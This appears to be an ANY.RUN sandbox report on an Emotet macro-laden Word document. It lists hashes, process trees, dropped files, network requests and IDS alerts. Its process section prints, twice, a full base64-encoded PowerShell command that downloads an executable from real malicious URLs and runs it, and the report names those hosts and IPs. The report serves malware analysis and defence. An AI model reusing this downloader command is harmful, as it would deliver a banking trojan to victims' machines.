analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Untitled_032019_47550.doc

Full analysis: https://app.any.run/tasks/faafda2e-7afc-4595-a9f6-6022d1376eae
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 08:08:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 20 14:29:00 2019, Last Saved Time/Date: Wed Mar 20 14:29:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5:

C31014A9EFD10203CFA48028CA928392

SHA1:

132DDC2D64254FA33DB5BAD7F7A93AD010FC7AB6

SHA256:

34DDB84DE696B5A8A8CF0423C5B3FB9DFDDF608F218095F7E39E97D9EEFC9C51

SSDEEP:

3072:v77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q8bKwRgG5O3YszJ8dhs:v77HUUUUUUUUUUUUUUUUUUUT52VbbKwS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 854.exe (PID: 3480)
      • 854.exe (PID: 2212)
      • wabmetagen.exe (PID: 3752)
      • wabmetagen.exe (PID: 292)
      • 854.exe (PID: 3020)
      • 854.exe (PID: 2328)
      • wabmetagen.exe (PID: 2484)
      • wabmetagen.exe (PID: 3732)
      • 854.exe (PID: 3736)
      • 854.exe (PID: 2872)
      • wabmetagen.exe (PID: 2152)
      • wabmetagen.exe (PID: 3072)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3548)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 3560)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3752)
      • wabmetagen.exe (PID: 3732)
      • wabmetagen.exe (PID: 2152)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3548)
      • 854.exe (PID: 2212)
      • powershell.exe (PID: 2448)
      • 854.exe (PID: 2328)
      • powershell.exe (PID: 3560)
      • 854.exe (PID: 2872)
    • Creates files in the user directory

      • powershell.exe (PID: 3548)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 3560)
    • Application launched itself

      • 854.exe (PID: 3480)
      • wabmetagen.exe (PID: 3752)
      • 854.exe (PID: 3020)
      • wabmetagen.exe (PID: 3732)
      • 854.exe (PID: 3736)
      • wabmetagen.exe (PID: 2152)
    • Starts itself from another location

      • 854.exe (PID: 2212)
      • 854.exe (PID: 2328)
      • 854.exe (PID: 2872)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2704)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2704)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:03:20 14:29:00
ModifyDate: 2019:03:20 14:29:00
Pages: 1
Words: -
Characters: 3
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 3
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
16
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start winword.exe no specs powershell.exe 854.exe no specs 854.exe #EMOTET wabmetagen.exe no specs powershell.exe wabmetagen.exe no specs 854.exe no specs 854.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs powershell.exe 854.exe no specs 854.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2704"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled_032019_47550.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3548powershell -e JAByAHcARABBAEEAMQBBAD0AKAAnAFgAQQBjACcAKwAnAEEAMQAnACsAJwBjACcAKQA7ACQAdgBEAEIAYwBRAEcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAUQBCADEAQgBrAFgAPQAoACcAaAB0AHQAcAA6AC8AJwArACcALwBhACcAKwAnAGsAYQAnACsAJwBzAGgAJwArACcAaQAnACsAJwBjACcAKwAnAGkAJwArACcAbgBzAGkAZwAnACsAJwBoACcAKwAnAHQAcwAuAGMAbwAnACsAJwBtACcAKwAnAC8AYQBiAHMAbwBsACcAKwAnAHUAdABlAF8AYQBiACcAKwAnAHUAbgBkACcAKwAnAGEAbgBjACcAKwAnAGUAXwBmAGkAbAAnACsAJwBlACcAKwAnAHMALwB4AGwAdgBwAC8AQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAGQAZQBtAG8ALQBwAHIAbwBnAGUAbgAnACsAJwBhAGoAJwArACcAYQAnACsAJwBuAHMALgBjAG8AJwArACcAbQAnACsAJwAvAGkAYwAnACsAJwBjACcAKwAnAGUAdAB1ACcAKwAnAHIAawBlACcAKwAnAHkAJwArACcALwBKAFUARwAnACsAJwB5ACcAKwAnAC8AQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHAAZAAnACsAJwBzAGMAJwArACcAbwAnACsAJwBuAHMAdQBsACcAKwAnAHQAaQBuAGcALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAGIAbABvACcAKwAnAGcAJwArACcAcwAvADMAawAyACcAKwAnAEMAWgAnACsAJwBZAC8AJwArACcAQABoAHQAdABwADoALwAnACsAJwAvAHcAdwB3AC4AbQBhAGoAbwByACcAKwAnAGkAcwB0AGEAbgBiACcAKwAnAHUAJwArACcAbAAuAGMAbwAnACsAJwBtACcAKwAnAC8AYwAnACsAJwBnAGkALQAnACsAJwBiAGkAJwArACcAbgAvACcAKwAnAGYAbgAnACsAJwBLAGwALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAYQB6ACcAKwAnAGUAZABpACcAKwAnAHoAYQB5AG4ALgBjAG8AbQAvACcAKwAnADIANgAnACsAJwAxADkAMgBSACcAKwAnAFgALwBDADkAMABEAC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAFIAQQB4AEEARABBAEIAPQAoACcAYwA0ACcAKwAnAHgAUQBRAEIAQQBBACcAKQA7ACQAegBBAEIAQwBBAGMAMQAgAD0AIAAoACcAOAAnACsAJwA1ADQAJwApADsAJABXAEEARAB4AEEAUQA9ACgAJwBXACcAKwAnAEEAQQA0AEEAUQBBACcAKQA7ACQAYwB3AEEARwBBAFUAQwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB6AEEAQgBDAEEAYwAxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASgBDAEcAUQBvAEQARwAgAGkAbgAgACQAbABRAEIAMQBCAGsAWAApAHsAdAByAHkAewAkAHYARABCAGMAUQBHAC4AKAAnAEQAJwArACcAbwB3ACcAKwAnAG4AbABvAGEAZABGAGkAJwArACcAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJABKAEMARwBRAG8ARABHACwAIAAkAGMAdwBBAEcAQQBVAEMAQwApADsAJABNAF8AQQBBAHgAYwBBAD0AKAAnAGgARwBfAEEAJwArACcARwBfACcAKwAnAFUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMAdwBBAEcAQQBVAEMAQwApAC4AIgBsAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACAAJABjAHcAQQBHAEEAVQBDAEMAOwAkAEoAVQBjAHcAQgBVAHgAQQA9ACgAJwBBAHcAQQBrAEEAVQAnACsAJwB4AEQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAWAA0AG8AXwBBAEIAPQAoACcAVQAxACcAKwAnAFgAQgBCACcAKwAnAF8AJwApADsA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3480"C:\Users\admin\854.exe" C:\Users\admin\854.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2212--d950c5f5C:\Users\admin\854.exe
854.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3752"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
854.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2448powershell -e JAByAHcARABBAEEAMQBBAD0AKAAnAFgAQQBjACcAKwAnAEEAMQAnACsAJwBjACcAKQA7ACQAdgBEAEIAYwBRAEcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAUQBCADEAQgBrAFgAPQAoACcAaAB0AHQAcAA6AC8AJwArACcALwBhACcAKwAnAGsAYQAnACsAJwBzAGgAJwArACcAaQAnACsAJwBjACcAKwAnAGkAJwArACcAbgBzAGkAZwAnACsAJwBoACcAKwAnAHQAcwAuAGMAbwAnACsAJwBtACcAKwAnAC8AYQBiAHMAbwBsACcAKwAnAHUAdABlAF8AYQBiACcAKwAnAHUAbgBkACcAKwAnAGEAbgBjACcAKwAnAGUAXwBmAGkAbAAnACsAJwBlACcAKwAnAHMALwB4AGwAdgBwAC8AQAAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAGQAZQBtAG8ALQBwAHIAbwBnAGUAbgAnACsAJwBhAGoAJwArACcAYQAnACsAJwBuAHMALgBjAG8AJwArACcAbQAnACsAJwAvAGkAYwAnACsAJwBjACcAKwAnAGUAdAB1ACcAKwAnAHIAawBlACcAKwAnAHkAJwArACcALwBKAFUARwAnACsAJwB5ACcAKwAnAC8AQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHAAZAAnACsAJwBzAGMAJwArACcAbwAnACsAJwBuAHMAdQBsACcAKwAnAHQAaQBuAGcALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAGIAbABvACcAKwAnAGcAJwArACcAcwAvADMAawAyACcAKwAnAEMAWgAnACsAJwBZAC8AJwArACcAQABoAHQAdABwADoALwAnACsAJwAvAHcAdwB3AC4AbQBhAGoAbwByACcAKwAnAGkAcwB0AGEAbgBiACcAKwAnAHUAJwArACcAbAAuAGMAbwAnACsAJwBtACcAKwAnAC8AYwAnACsAJwBnAGkALQAnACsAJwBiAGkAJwArACcAbgAvACcAKwAnAGYAbgAnACsAJwBLAGwALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAYQB6ACcAKwAnAGUAZABpACcAKwAnAHoAYQB5AG4ALgBjAG8AbQAvACcAKwAnADIANgAnACsAJwAxADkAMgBSACcAKwAnAFgALwBDADkAMABEAC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAFIAQQB4AEEARABBAEIAPQAoACcAYwA0ACcAKwAnAHgAUQBRAEIAQQBBACcAKQA7ACQAegBBAEIAQwBBAGMAMQAgAD0AIAAoACcAOAAnACsAJwA1ADQAJwApADsAJABXAEEARAB4AEEAUQA9ACgAJwBXACcAKwAnAEEAQQA0AEEAUQBBACcAKQA7ACQAYwB3AEEARwBBAFUAQwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB6AEEAQgBDAEEAYwAxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASgBDAEcAUQBvAEQARwAgAGkAbgAgACQAbABRAEIAMQBCAGsAWAApAHsAdAByAHkAewAkAHYARABCAGMAUQBHAC4AKAAnAEQAJwArACcAbwB3ACcAKwAnAG4AbABvAGEAZABGAGkAJwArACcAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJABKAEMARwBRAG8ARABHACwAIAAkAGMAdwBBAEcAQQBVAEMAQwApADsAJABNAF8AQQBBAHgAYwBBAD0AKAAnAGgARwBfAEEAJwArACcARwBfACcAKwAnAFUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMAdwBBAEcAQQBVAEMAQwApAC4AIgBsAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACAAJABjAHcAQQBHAEEAVQBDAEMAOwAkAEoAVQBjAHcAQgBVAHgAQQA9ACgAJwBBAHcAQQBrAEEAVQAnACsAJwB4AEQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAWAA0AG8AXwBBAEIAPQAoACcAVQAxACcAKwAnAFgAQgBCACcAKwAnAF8AJwApADsA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
292--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3020"C:\Users\admin\854.exe" C:\Users\admin\854.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2328--d950c5f5C:\Users\admin\854.exe
854.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3732"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
854.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
Total events
2 792
Read events
2 206
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
6
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFAD2.tmp.cvr
MD5:
SHA256:
3548powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F86EFKPBQT4TDVMOEAU2.temp
MD5:
SHA256:
2448powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8VQETPJYKT0GIWKTUW3.temp
MD5:
SHA256:
3560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SG9LEAG5UXW4MJXJIP0D.temp
MD5:
SHA256:
3548powershell.exeC:\Users\admin\854.exeexecutable
MD5:902F604514341F6A1FF82AF93A2982F0
SHA256:60DEB65D476C535A18CF479FBDA5B55C8AF0E4C5149DE7FF291A9814A8486EA7
2704WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:355A6BD71AC0DF56F75997F3F85DEE33
SHA256:D0D25B28324D07C27268219D04FE0B0C55929F10EEE6C447062329F925F89869
2704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:6CCC6452BC66FE4B4A278310B8D6A82F
SHA256:AAA043AE2528C23C20FC2D2D76C30FD033A94827AD864F79A666BDE5556152AC
2212854.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:902F604514341F6A1FF82AF93A2982F0
SHA256:60DEB65D476C535A18CF479FBDA5B55C8AF0E4C5149DE7FF291A9814A8486EA7
2448powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF103ab9.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3548powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2448
powershell.exe
GET
200
91.191.173.125:80
http://demo-progenajans.com/icceturkey/JUGy/
TR
executable
360 Kb
suspicious
3560
powershell.exe
GET
200
91.191.173.125:80
http://demo-progenajans.com/icceturkey/JUGy/
TR
executable
360 Kb
suspicious
3548
powershell.exe
GET
200
91.191.173.125:80
http://demo-progenajans.com/icceturkey/JUGy/
TR
executable
360 Kb
suspicious
3548
powershell.exe
GET
404
64.41.87.42:80
http://akashicinsights.com/absolute_abundance_files/xlvp/
US
html
1.22 Kb
malicious
2448
powershell.exe
GET
404
64.41.87.42:80
http://akashicinsights.com/absolute_abundance_files/xlvp/
US
html
1.22 Kb
malicious
3560
powershell.exe
GET
404
64.41.87.42:80
http://akashicinsights.com/absolute_abundance_files/xlvp/
US
html
1.22 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3548
powershell.exe
64.41.87.42:80
akashicinsights.com
Affinity Internet, Inc
US
suspicious
2448
powershell.exe
64.41.87.42:80
akashicinsights.com
Affinity Internet, Inc
US
suspicious
2448
powershell.exe
91.191.173.125:80
demo-progenajans.com
Netdirekt A.S.
TR
suspicious
3548
powershell.exe
91.191.173.125:80
demo-progenajans.com
Netdirekt A.S.
TR
suspicious
3560
powershell.exe
64.41.87.42:80
akashicinsights.com
Affinity Internet, Inc
US
suspicious
3560
powershell.exe
91.191.173.125:80
demo-progenajans.com
Netdirekt A.S.
TR
suspicious

DNS requests

Domain
IP
Reputation
akashicinsights.com
  • 64.41.87.42
malicious
demo-progenajans.com
  • 91.191.173.125
suspicious

Threats

PID
Process
Class
Message
3548
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3548
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3548
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2448
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2448
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2448
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3560
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3560
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3560
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info